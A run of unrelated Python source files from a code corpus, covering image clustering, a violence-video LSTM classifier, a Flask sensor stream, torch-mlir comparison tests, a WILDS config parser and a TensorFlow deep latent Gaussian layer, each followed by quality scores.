device = torch.device("cuda:0" )
# image = [0, 2, 3, 5, 22, 23, 24, 25, 39, 40, 41, 42, 43, 45, 46, 48]
# val = [0, 3, 25, 39]
# val = [t for t in range(iter*2,iter*2+4)]
# val = [0, 2, 3, 5, 22, 23, 24, 25, 39, 40, 41, 42, 43, 45, 46, 48] #for simple clevr
val = [2,3,7,8,9,12, 15,16, 22,23,24, 27,28,31, 32,35, 37, 38, 40,43, 46,47, 48,51,52] #for clevrtex
# val = [8,9,26,27,31,32,33,34,38,39,40,45,46,47,52,53,57,58,59,60]
# val = [ 4, 5, 6, 23, 24, 30, 33, 40, 41, 42, 43, 45, 46, 48, 58] #for clevrtex
# val = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
# val = [0,1,2, 9,10,11,12,13,14,16,17,24,25,27,28]
print(val)
val_images, val_depths, val_poses = images[val], depth_maps[val], poses[val]
cluster_size = 100
cluster_images = tf.compat.v1.image.resize(val_images, [cluster_size, cluster_size], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR).numpy()
cluster_depth = tf.compat.v1.image.resize(val_depths[...,None], [cluster_size, cluster_size], method=tf.image.ResizeMethod.NEAREST_NEIGHBOR).numpy()
cluster_depth = cluster_depth[...,0]
cluster_images, cluster_depth, val_poses = torch.from_numpy(cluster_images), torch.from_numpy(cluster_depth), torch.from_numpy(val_poses)
H,W,focal = hwf
_,H,W,_ = cluster_images.shape
hwf= [H,W,focal]
# val_images, val_depths, val_poses = val_images.to(device), val_depths.to(device), val_poses.to(device)
with torch.no_grad():
cluster_images, cluster_depth, val_poses = cluster_images.to(device), cluster_depth.to(device), val_poses.to(device)
f_extractor = Encoder_VGG(hwf, device=device)
f_extractor.to(device)
print(cluster_images.shape)
print(cluster_depth.shape)
print(val_poses.shape)
f = f_extractor(cluster_images, cluster_depth, val_poses)
B, H, W, C = f.shape
f = f.reshape([-1, C])
f_p = f[...,C-3:]
f = f[...,:C-3]
w = 10.
attn_logits = KM_clustering(f, f_p, w, device)
attn = attn_logits.softmax(dim=-1)
attn = attn.reshape([B,H,W,2])
attn = attn.permute([0,3,1,2])
attn = attn.cpu().numpy()
cluster_images = cluster_images.cpu().numpy()
# print(iter)
seg_inputs = []
for b in range(B):
for s in range(2):
imageio.imwrite(os.path.join(first_cluster_dir, 'val_{:06d}_slot{:01d}.jpg'.format(b,s)), to8b(attn[b][s]))
imageio.imwrite(os.path.join(first_cluster_dir, 'masked_{:06d}_slot{:01d}.jpg'.format(b,s)), to8b(attn[b][s][...,None]*cluster_images[b]))
im = to8b(attn[b][1])
dilation = ndimage.binary_dilation(im)
dilation = ndimage.binary_dilation(dilation, iterations=5)
# erode = ndimage.binary_erosion(dilation, iterations=1)
origin = images[val[b]]
erode = (dilation / 255.).astype(np.float32)
erode = tf.compat.v1.image.resize_area(erode[None, ..., None], [input_size, input_size]).numpy()
seg_input = to8b(erode[0, ...] * origin * 255.)
seg_inputs.append(torch.from_numpy(seg_input))
imageio.imsave(os.path.join(mask_refine_dir,'seg_input{:d}.png'.format(b)),seg_input)
imageio.imsave(os.path.join(mask_refine_dir,'mask{:d}.png').format(b), to8b(erode[0] * 255.))
# seg_inputs = torch.stack(seg_inputs)
# seg_inputs = seg_inputs/255.
# print(seg_inputs.shape)
# torch.cuda.empty_cache()
# imgs = []
# for i in range(15):
# fname = os.path.join(mask_refine_dir, 'seg_input{:01d}.png'.format(i))
# imgs.append(imageio.imread(fname))
# imgs = (np.array(imgs) / 255.).astype(np.float32) # keep all 4 channels (RGBA)
# imgs= imgs[...,:3]
# seg_inputs = torch.from_numpy(imgs)
# model, target_im = train(seg_inputs, base_dir)
# cluster = np.unique(im_target)
# target_im = target_im.cpu().numpy()
# final_masks = []
# for c in range(cluster.shape[0]):
# masks = (target_im==cluster[c])
# cluster_masks = []
# for b in range(B):
# im = mask[b]
# dilation = ndimage.binary_dilation(im, iterations= 1)
# erode = ndimage.binary_erosion(im, iterations= 4)
# cluster_masks.append(erode)
# cluster_masks = torch.stack(cluster_masks)
# final_masks.append(cluster_masks)
# final_masks = torch.stack(final_masks, dim=-1)
# init_bg_mask = attn[0][0]
# init_bg_mask = tf.compat.v1.image.resize_area(init_bg_mask[None, ..., None], [input_size, input_size]).numpy()
# init_bg_mask = init_bg_mask[0,...,0]
# inter_area = []
# for c in range(cluster.shape[0]):
# intersection = init_bg_mask*final_masks[0,...,c]
# inter_area.append(np.sum(intersection))
# max_value = max(inter_area)
# max_index = number_list.index(max_value)
# val_images = torch.from_numpy(val_images)
# val_images = val_images.to(device)
# output = model( val_images )
# inti_slot = val_images.shape[1]
# output = output.permute([0,2,3,1]).reshape( [-1, inti_slot] )
# cluster_index = []
# for c in range(cluster.shape[0]):
# cur_m = final_masks[..., c]
# cur_m = cur_m.reshape(-1)
# cluster_index.append(cur_m)
# for i in range(5):
# t = []
# print('sample')
# for j in range(cluster.shape[0]):
# size = cluster_index[j].shape[0]
# index = torch.randint(size, (size//10,))
# c_class = cluster.shape[0][j]
# c_class = c_class[index]
# t.append(c_class.mean(dim=0))
# for j in range(cluster.shape[0]):
# print(torch.norm(t[j]-t[max_index]))
| 1.96875
| 2
|
archive/nexus-api-v2/Database/Utilities/Discord/Enumerations/Channel.py
|
cloud-hybrid/delta
| 0
|
12784784
|
"""
...
"""
from . import *
class Type(Integer, Enumeration):
"""
...
"""
TEXT = 0x0
PRIVATE = 0x1
VOICE = 0x2
GROUP = 0x3
CATEGORTY = 0x4
NEWS = 0x5
STORE = 0x6
def __str__(self):
""" String Representation of Enumeration """
return self.name
__all__ = [
"Type"
]
| 2.953125
| 3
|
LSTM.py
|
niyazed/violence-video-classification
| 9
|
12784785
|
<filename>LSTM.py
import numpy as np
import os
import cv2
import keras
import sklearn
import pandas
from time import time
from sklearn.model_selection import train_test_split
from keras.models import Sequential
from keras.utils import to_categorical
from keras.models import load_model
from keras.layers import *
from keras import layers
from keras import Model
from keras.callbacks import TensorBoard
from keras import optimizers
import matplotlib.pyplot as plt
from keras.applications import *
from sklearn.metrics import classification_report
import time
input = np.load("resnet_features.npy")
print(input.shape)
X = np.reshape(input,(input.shape[0],input.shape[1],input.shape[2]*input.shape[3]))
print(X.shape)
y_violent = np.zeros(87)
y_non_violent = np.ones(88)
y = np.append(y_violent,y_non_violent)
print(y.shape)
X_train, X_test, y_train, y_test = train_test_split(X,y, random_state=42, test_size=0.2)
print(X_train.shape,X_test.shape,y_train.shape, y_test.shape)
model = Sequential()
model.add(CuDNNLSTM(50, input_shape=(X.shape[1],X.shape[2]), return_sequences=False, kernel_regularizer=regularizers.l2(0.01)))
model.add(Dense(1,activation='sigmoid'))
model.summary()
optimizer = optimizers.adam(lr=0.001,decay=0.004)
model.compile(loss="binary_crossentropy",optimizer=optimizer,metrics=["accuracy"])
start = time.time()
model.fit(X_train,y_train, epochs=20, verbose=1, validation_data=(X_test,y_test), batch_size=32)
end = time.time()
time = end - start
print("Time: ", time)
# model.save_weights("resnet_LSTM.h5")
# pred = model.predict(X_test)
# prediction = []
# for p in pred:
# if p>=.5:
# prediction.append(1)
# else:
# prediction.append(0)
# print(classification_report(prediction, y_test))
| 2.90625
| 3
|
sensores/server/application.py
|
luyisimiger/proyecto_sensores
| 0
|
12784786
|
"""server docstring"""
import json
import random
import time
from datetime import datetime
from flask import Flask, Response, render_template, redirect, url_for
from flask_mongoengine import MongoEngine
from sensores.db.models import Sensor, Medition
from sensores.db import util
from .businesslogic import get_sensors_data
from ..db.util import connect_redis
application = Flask(__name__)
application.config.from_object('sensores.server.config')
db = MongoEngine(application)
redis_client = connect_redis()
# register blueprint's
from .views import main as main_blueprint
from .sensors import sensor as sensor_blueprint
application.register_blueprint(main_blueprint)
application.register_blueprint(sensor_blueprint)
random.seed() # Initialize the random number generator
@application.route('/stream/sensors/data')
def stream():
def stream_sensors_data():
for s in Sensor.objects:
meditions = []
for m in Medition.objects(sensor=s.id):
meditions.append({
'fechahora': m.fechahora.strftime('%Y-%m-%d %H:%M:%S'),
'value': m.value
})
json_data = json.dumps({
'sensor': {
'type': s.type,
'name': s.name,
'meditions': meditions
}
})
yield f"data: {json_data}\n\n"
time.sleep(0.6)
return Response(stream_sensors_data(), mimetype='text/event-stream')
if __name__ == '__main__':
util.conectdb()
application.run(debug=True, threaded=True)
| 2.203125
| 2
|
tknb/queue_message.py
|
TimonLukas/tknb
| 0
|
12784787
|
from enum import Enum
from typing import Tuple, Any
class MessageType(Enum):
METHOD_CALL = 0
CUSTOM_EVENT = 1
QueueMessage = Tuple[MessageType, str, Any]
| 2.90625
| 3
|
Montecarlo_.py
|
boodahDEV/Python_shoes
| 0
|
12784788
|
import matplotlib.pyplot as plt
plt.rcParams['toolbar'] = 'None'
import numpy as np # importando numpy
def genera_montecarlo(N=100000):
plt.figure(figsize=(6,6))
x, y = np.random.uniform(-1, 1, size=(2, N))
interior = (x**2 + y**2) <= 1
pi = interior.sum() * 4 / N
error = abs((pi - np.pi) / pi) * 100
exterior = np.invert(interior)
plt.plot(x[interior], y[interior], 'b.')
plt.plot(x[exterior], y[exterior], 'r.')
plt.plot(0, 0, label='$\hat \pi$ = {:4.4f} \nerror = {:4.4f}%'.format(pi,error), alpha=0, color='g')
plt.axis('square')
plt.legend(frameon=True, framealpha=0.9, fontsize=16)
plt.show()
genera_montecarlo()
| 2.9375
| 3
|
alien.py
|
cmotek/python_crashcourse
| 0
|
12784789
|
<reponame>cmotek/python_crashcourse
alien_0 = {'x_position': 0, 'y_position': 25, 'speed': 'medium'}
print(f"Original position: {alien_0['x_position']}")
if alien_0['speed'] == 'slow':
x_increment = 1
elif alien_0['speed'] == 'medium':
x_increment = 2
else:
x_increment = 3
alien_0['x_position'] = alien_0['x_position'] + x_increment
print(f"New position: {alien_0['x_position']}")
alien_0 = {'color': 'green', 'points': 5}
print(alien_0)
del alien_0['points']
print(alien_0)
| 2.921875
| 3
|
notebooks/utils.py
|
yangarbiter/wilds
| 0
|
12784790
|
import sys
sys.path.append("../")
sys.path.append("../examples/")
import argparse
from configs import supported
from configs.utils import populate_defaults
import wilds
# Taken from https://sumit-ghosh.com/articles/parsing-dictionary-key-value-pairs-kwargs-argparse-python/
class ParseKwargs(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, dict())
for value in values:
key, value_str = value.split('=')
if value_str.replace('-','').isnumeric():
processed_val = int(value_str)
elif value_str.replace('-','').replace('.','').isnumeric():
processed_val = float(value_str)
elif value_str in ['True', 'true']:
processed_val = True
elif value_str in ['False', 'false']:
processed_val = False
else:
processed_val = value_str
getattr(namespace, self.dest)[key] = processed_val
def parse_bool(v):
if v.lower()=='true':
return True
elif v.lower()=='false':
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def get_config(dataset, algorithm, root_dir):
parser = argparse.ArgumentParser()
# Required arguments
parser.add_argument('-d', '--dataset', choices=wilds.supported_datasets, required=True)
parser.add_argument('--algorithm', required=True, choices=supported.algorithms)
parser.add_argument('--root_dir', required=True,
help='The directory where [dataset]/data can be found (or should be downloaded to, if it does not exist).')
parser.add_argument('--enable_privacy', default=False, action='store_true')
# Dataset
parser.add_argument('--split_scheme', help='Identifies how the train/val/test split is constructed. Choices are dataset-specific.')
parser.add_argument('--dataset_kwargs', nargs='*', action=ParseKwargs, default={})
parser.add_argument('--download', default=False, type=parse_bool, const=True, nargs='?',
help='If true, tries to downloads the dataset if it does not exist in root_dir.')
parser.add_argument('--subsample', default=False, type=parse_bool, const=True, nargs='?',
help='If true, subsample every group to the minimum group size.')
parser.add_argument('--frac', type=float, default=1.0,
help='Convenience parameter that scales all dataset splits down to the specified fraction, for development purposes. Note that this also scales the test set down, so the reported numbers are not comparable with the full test set.')
parser.add_argument('--version', default=None, type=str)
# Loaders
parser.add_argument('--loader_kwargs', nargs='*', action=ParseKwargs, default={})
parser.add_argument('--train_loader', choices=['standard', 'group'])
parser.add_argument('--uniform_over_groups', type=parse_bool, const=True, nargs='?')
parser.add_argument('--distinct_groups', type=parse_bool, const=True, nargs='?')
parser.add_argument('--n_groups_per_batch', type=int)
parser.add_argument('--batch_size', type=int)
parser.add_argument('--eval_loader', choices=['standard'], default='standard')
parser.add_argument('--weighted_uniform_iid', type=parse_bool, const=True, nargs='?')
parser.add_argument('--uniform_iid', type=parse_bool, const=True, nargs='?')
parser.add_argument("--sample_rate", type=float, default=0.001, metavar="SR",
help="sample rate used for batch construction (default: 0.001)",)
# Model
parser.add_argument('--model', choices=supported.models)
parser.add_argument('--model_kwargs', nargs='*', action=ParseKwargs, default={},
help='keyword arguments for model initialization passed as key1=value1 key2=value2')
# Transforms
parser.add_argument('--transform', choices=supported.transforms)
parser.add_argument('--target_resolution', nargs='+', type=int, help='The input resolution that images will be resized to before being passed into the model. For example, use --target_resolution 224 224 for a standard ResNet.')
parser.add_argument('--resize_scale', type=float)
parser.add_argument('--max_token_length', type=int)
# Objective
parser.add_argument('--loss_function', choices = supported.losses)
parser.add_argument('--loss_kwargs', nargs='*', action=ParseKwargs, default={},
help='keyword arguments for loss initialization passed as key1=value1 key2=value2')
# Algorithm
parser.add_argument('--groupby_fields', nargs='+')
parser.add_argument('--group_dro_step_size', type=float)
parser.add_argument('--coral_penalty_weight', type=float)
parser.add_argument('--irm_lambda', type=float)
parser.add_argument('--irm_penalty_anneal_iters', type=int)
parser.add_argument('--algo_log_metric')
# Model selection
parser.add_argument('--val_metric')
parser.add_argument('--val_metric_decreasing', type=parse_bool, const=True, nargs='?')
# Optimization
parser.add_argument('--n_epochs', type=int)
parser.add_argument('--optimizer', choices=supported.optimizers)
parser.add_argument('--lr', type=float)
parser.add_argument('--weight_decay', type=float)
parser.add_argument('--max_grad_norm', type=float)
parser.add_argument('--optimizer_kwargs', nargs='*', action=ParseKwargs, default={})
parser.add_argument('--sigma', type=float, default=1.0)
parser.add_argument('--max_per_sample_grad_norm', type=float, default=1.0)
parser.add_argument('--delta', type=float, default=1e-5)
# Scheduler
parser.add_argument('--scheduler', choices=supported.schedulers)
parser.add_argument('--scheduler_kwargs', nargs='*', action=ParseKwargs, default={})
parser.add_argument('--scheduler_metric_split', choices=['train', 'val'], default='val')
parser.add_argument('--scheduler_metric_name')
# Evaluation
parser.add_argument('--process_outputs_function', choices = supported.process_outputs_functions)
parser.add_argument('--evaluate_all_splits', type=parse_bool, const=True, nargs='?', default=True)
parser.add_argument('--eval_splits', nargs='+', default=[])
parser.add_argument('--eval_only', type=parse_bool, const=True, nargs='?', default=False)
parser.add_argument('--eval_epoch', default=None, type=int, help='If eval_only is set, then eval_epoch allows you to specify evaluating at a particular epoch. By default, it evaluates the best epoch by validation performance.')
# Misc
parser.add_argument('--device', type=int, default=0)
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--log_dir', default='./logs')
parser.add_argument('--log_every', default=50, type=int)
parser.add_argument('--save_step', type=int)
parser.add_argument('--save_best', type=parse_bool, const=True, nargs='?', default=True)
parser.add_argument('--save_last', type=parse_bool, const=True, nargs='?', default=True)
parser.add_argument('--save_pred', type=parse_bool, const=True, nargs='?', default=True)
parser.add_argument('--no_group_logging', type=parse_bool, const=True, nargs='?')
parser.add_argument('--use_wandb', type=parse_bool, const=True, nargs='?', default=False)
parser.add_argument('--progress_bar', type=parse_bool, const=True, nargs='?', default=False)
parser.add_argument('--resume', type=parse_bool, const=True, nargs='?', default=False)
config = parser.parse_args(["--dataset", dataset, "--algorithm", algorithm, "--root_dir", root_dir])
config = populate_defaults(config)
return config
| 2.609375
| 3
|
e2e_testing/torchscript/elementwise_comparison.py
|
pashu123/torch-mlir
| 0
|
12784791
|
<filename>e2e_testing/torchscript/elementwise_comparison.py
# Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
# Also available under a BSD-style license. See LICENSE.
import torch
from torch_mlir_e2e_test.torchscript.framework import TestUtils
from torch_mlir_e2e_test.torchscript.registry import register_test_case
from torch_mlir_e2e_test.torchscript.annotations import annotate_args, export
# ==============================================================================
class ElementwiseGtFloatScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
])
def forward(self, x):
return torch.gt(x, 0.6)
@register_test_case(module_factory=lambda: ElementwiseGtFloatScalarModule())
def ElementwiseGtFloatScalarModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5))
# ==============================================================================
class ElementwiseGtIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
])
def forward(self, x):
return torch.gt(x, 10)
@register_test_case(module_factory=lambda: ElementwiseGtIntScalarModule())
def ElementwiseGtIntScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)))
# ==============================================================================
class ElementwiseGtMixed2ScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int32, True),
])
def forward(self, x):
return torch.gt(x, 7)
@register_test_case(module_factory=lambda: ElementwiseGtMixed2ScalarModule())
def ElementwiseGtMixed2ScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)).to(torch.int32))
# ==============================================================================
class ElementwiseGeFloatScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
])
def forward(self, x):
return torch.ge(x, 0.6)
@register_test_case(module_factory=lambda: ElementwiseGeFloatScalarModule())
def ElementwiseGeFloatScalarModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5))
# ==============================================================================
class ElementwiseGeIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
])
def forward(self, x):
return torch.ge(x, 10)
@register_test_case(module_factory=lambda: ElementwiseGeIntScalarModule())
def ElementwiseGeIntScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)))
# ==============================================================================
class ElementwiseGeMixedIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int32, True),
])
def forward(self, x):
return torch.ge(x, 7)
@register_test_case(module_factory=lambda: ElementwiseGeMixedIntScalarModule())
def ElementwiseGeMixedIntScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)).to(torch.int32))
# ==============================================================================
class ElementwiseGeFloatIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
])
def forward(self, x):
return torch.ge(x, 7)
@register_test_case(module_factory=lambda: ElementwiseGeFloatIntScalarModule())
def ElementwiseGeFloatIntScalarModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5))
# ==============================================================================
class ElementwiseGtFloatTensorModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
([-1], torch.float32, True),
])
def forward(self, x, y):
return torch.gt(x, y)
@register_test_case(module_factory=lambda: ElementwiseGtFloatTensorModule())
def ElementwiseGtFloatTensorModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5), tu.rand(5))
# ==============================================================================
class ElementwiseGtIntTensorModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
([-1], torch.int64, True),
])
def forward(self, x, y):
return torch.gt(x, y)
@register_test_case(module_factory=lambda: ElementwiseGtIntTensorModule())
def ElementwiseGtIntTensorModule_basic(module, tu: TestUtils):
module.forward(torch.randint(10, (3, 5)), torch.randint(10, (5, )))
# ==============================================================================
class ElementwiseLtFloatScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
])
def forward(self, x):
return torch.lt(x, 0.6)
@register_test_case(module_factory=lambda: ElementwiseLtFloatScalarModule())
def ElementwiseLtFloatScalarModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5))
# ==============================================================================
class ElementwiseLtIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
])
def forward(self, x):
return torch.lt(x, 0)
@register_test_case(module_factory=lambda: ElementwiseLtIntScalarModule())
def ElementwiseLtIntScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)))
# ==============================================================================
class ElementwiseLtDiffWidthScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int32, True),
])
def forward(self, x):
return torch.lt(x, 2)
@register_test_case(
module_factory=lambda: ElementwiseLtDiffWidthScalarModule())
def ElementwiseLtDiffWidthScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)).to(torch.int32))
# ==============================================================================
class ElementwiseLeFloatScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
])
def forward(self, x):
return torch.le(x, 0.6)
@register_test_case(module_factory=lambda: ElementwiseLeFloatScalarModule())
def ElementwiseLeFloatScalarModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5))
# ==============================================================================
class ElementwiseLeIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
])
def forward(self, x):
return torch.le(x, 10)
@register_test_case(module_factory=lambda: ElementwiseLeIntScalarModule())
def ElementwiseLeIntScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)))
# ==============================================================================
class ElementwiseLeMixedIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int32, True),
])
def forward(self, x):
return torch.le(x, 7)
@register_test_case(module_factory=lambda: ElementwiseLeMixedIntScalarModule())
def ElementwiseLeMixedIntScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(-10, 15, (3, 4)).to(torch.int32))
# ==============================================================================
class ElementwiseLeFloatIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
])
def forward(self, x):
return torch.le(x, 7)
@register_test_case(module_factory=lambda: ElementwiseLeFloatIntScalarModule())
def ElementwiseLeFloatIntScalarModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5))
# ==============================================================================
class ElementwiseLtFloatTensorModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
([-1], torch.float32, True),
])
def forward(self, x, y):
return torch.lt(x, y)
@register_test_case(module_factory=lambda: ElementwiseLtFloatTensorModule())
def ElementwiseLtFloatTensorModule_basic(module, tu: TestUtils):
module.forward(tu.rand(3, 5), tu.rand(5))
# ==============================================================================
class ElementwiseLtIntTensorModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
([-1], torch.int64, True),
])
def forward(self, x, y):
return torch.lt(x, y)
@register_test_case(module_factory=lambda: ElementwiseLtIntTensorModule())
def ElementwiseLtIntTensorModule_basic(module, tu: TestUtils):
module.forward(torch.randint(10, (3, 5)), torch.randint(10, (5, )))
# ==============================================================================
class ElementwiseEqFloatScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
])
def forward(self, x):
return torch.eq(x, 6.0)
@register_test_case(module_factory=lambda: ElementwiseEqFloatScalarModule())
def ElementwiseEqFloatScalarModule_basic(module, tu: TestUtils):
module.forward(
torch.tensor([[1.0, 2.2, 6.0], [6.0, 2.0, 3.1]]).to(torch.float32))
# ==============================================================================
class ElementwiseEqIntScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
])
def forward(self, x):
return torch.eq(x, 2)
@register_test_case(module_factory=lambda: ElementwiseEqIntScalarModule())
def ElementwiseEqIntScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(2, 4, (5, 8)))
# ==============================================================================
class ElementwiseEqDiffWidthScalarModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int32, True),
])
def forward(self, x):
return torch.eq(x, 2)
@register_test_case(
module_factory=lambda: ElementwiseEqDiffWidthScalarModule())
def ElementwiseEqDiffWidthScalarModule_basic(module, tu: TestUtils):
module.forward(torch.randint(2, 4, (5, 8)).to(torch.int32))
# ==============================================================================
class ElementwiseEqFloatTensorModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.float32, True),
([-1], torch.float32, True),
])
def forward(self, x, y):
return torch.eq(x, y)
@register_test_case(module_factory=lambda: ElementwiseEqFloatTensorModule())
def ElementwiseEqFloatTensorModule_basic(module, tu: TestUtils):
module.forward(
torch.tensor([[1.0, 2.2, 6.0], [6.0, 2.0, 3.1]]).to(torch.float32),
torch.tensor([1.0, 2.4, 6.0]).to(torch.float32))
# ==============================================================================
class ElementwiseEqIntTensorModule(torch.nn.Module):
def __init__(self):
super().__init__()
@export
@annotate_args([
None,
([-1, -1], torch.int64, True),
([-1], torch.int64, True),
])
def forward(self, x, y):
return torch.eq(x, y)
@register_test_case(module_factory=lambda: ElementwiseEqIntTensorModule())
def ElementwiseEqIntTensorModule_basic(module, tu: TestUtils):
module.forward(torch.randint(2, 4, (8, 5)), torch.randint(2, 4, (5, )))
| 1.96875
| 2
|
gokart/utils.py
|
ujiuji1259/gokart
| 0
|
12784792
|
<reponame>ujiuji1259/gokart<gh_stars>0
import os
import luigi
def add_config(file_path: str):
_, ext = os.path.splitext(file_path)
luigi.configuration.core.parser = ext
assert luigi.configuration.add_config_path(file_path)
| 2.109375
| 2
|
layers.py
|
pearsonlab/tf_gbds
| 0
|
12784793
|
"""
The MIT License (MIT)
Copyright (c) 2017 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy as np
import tensorflow as tf
from tensorflow.contrib.keras import backend
from tensorflow.contrib.keras import layers as keras_layers
class DLGMLayer(keras_layers.Layer):
"""
This layer is inspired by the paper "Stochastic Backpropagation and
Approximate Inference in Deep Generative Models"
incoming (Lasagne Layer): preceding layer in DLGM
num_units (int): number of output units in this layer
srng (theano RandomState): random number generator
rec_nets (dictionary of lasagne NNs): Neural networks that
paramaterize the recognition model
J (theano symbolic matrix): Input to rec model
k (float): regularization term on generative weights
"""
def __init__(self, incoming, num_units, rec_nets, k,
output_layer=False, extra_noise=0.01,
param_init=tf.random_normal_initializer(0, 0.01),
nonlinearity=tf.nn.relu,
**kwargs):
super(DLGMLayer, self).__init__(**kwargs)
num_inputs = incoming.output_shape[1]
self.num_units = num_units
self.output_layer = output_layer
self.extra_noise = extra_noise
# Initialize generative/decoding Parameters
self.W = self.add_variable(name='W', shape=(num_inputs, num_units),
initializer=param_init)
self.b = self.add_variable(name='b', shape=(num_units,),
initializer=param_init)
self.unc_G = self.add_variable(name='unc_G',
shape=(num_units, num_units),
initializer=param_init)
self.G = (tf.diag(tf.nn.softplus(tf.diag_part(self.unc_G))) +
self.unc_G - tf.matrix_band_part(self.unc_G, 0, -1))
self.nonlinearity = nonlinearity
# regularization term
self.k = k
# Load recognition/encoding Parameters
self.mu_net = rec_nets['mu_net']
self.u_net = rec_nets['u_net']
self.unc_d_net = rec_nets['unc_d_net']
def build(self, incoming, postJ):
rec_params = (self.mu_net.variables +
self.u_net.variables +
self.unc_d_net.variables)
i = 0
for param in rec_params:
self.add_variable(name="param"+str(i), shape=None,
initializer=param)
i += 1
super(DLGMLayer, self).build(incoming)
def calculate_xi(self, postJ):
"""
Calculate xi based on sampled J from posterior
"""
# get output of rec model
self.batch_mu = self.mu_net(postJ)
self.batch_u = self.u_net(postJ)
self.batch_unc_d = self.unc_d_net(postJ)
# add extra dim to batch_u, so it gets treated as column vectors when
# iterated over
self.batch_u = tf.expand_dims(self.batch_u, -1)
def get_cov(acc, inputs):
# convert output of rec model to rank-1 covariance matrix
# use softplus to get positive constrained d, minimum of -15
# since softplus will turn low numbers into 0, which become NaNs
# when inverted
u, unc_d = inputs
d = tf.nn.softplus(tf.maximum(unc_d, -15.0))
D_inv = tf.diag(1.0 / d)
eta = 1.0 / (tf.matmul(tf.matmul(tf.transpose(u), D_inv), u) + 1.0)
C = D_inv - eta*tf.matmul(tf.matmul(tf.matmul(D_inv, u),
tf.transpose(u)), D_inv)
Tr_C = tf.trace(C)
ld_C = tf.log(eta) - tf.reduce_sum(tf.log(d)) # eq 20 in DLGM
# coeff = ((1 - T.sqrt(eta)) / (u.T.dot(D_inv).dot(u)))
# simplified coefficient below is more stable as u -> 0
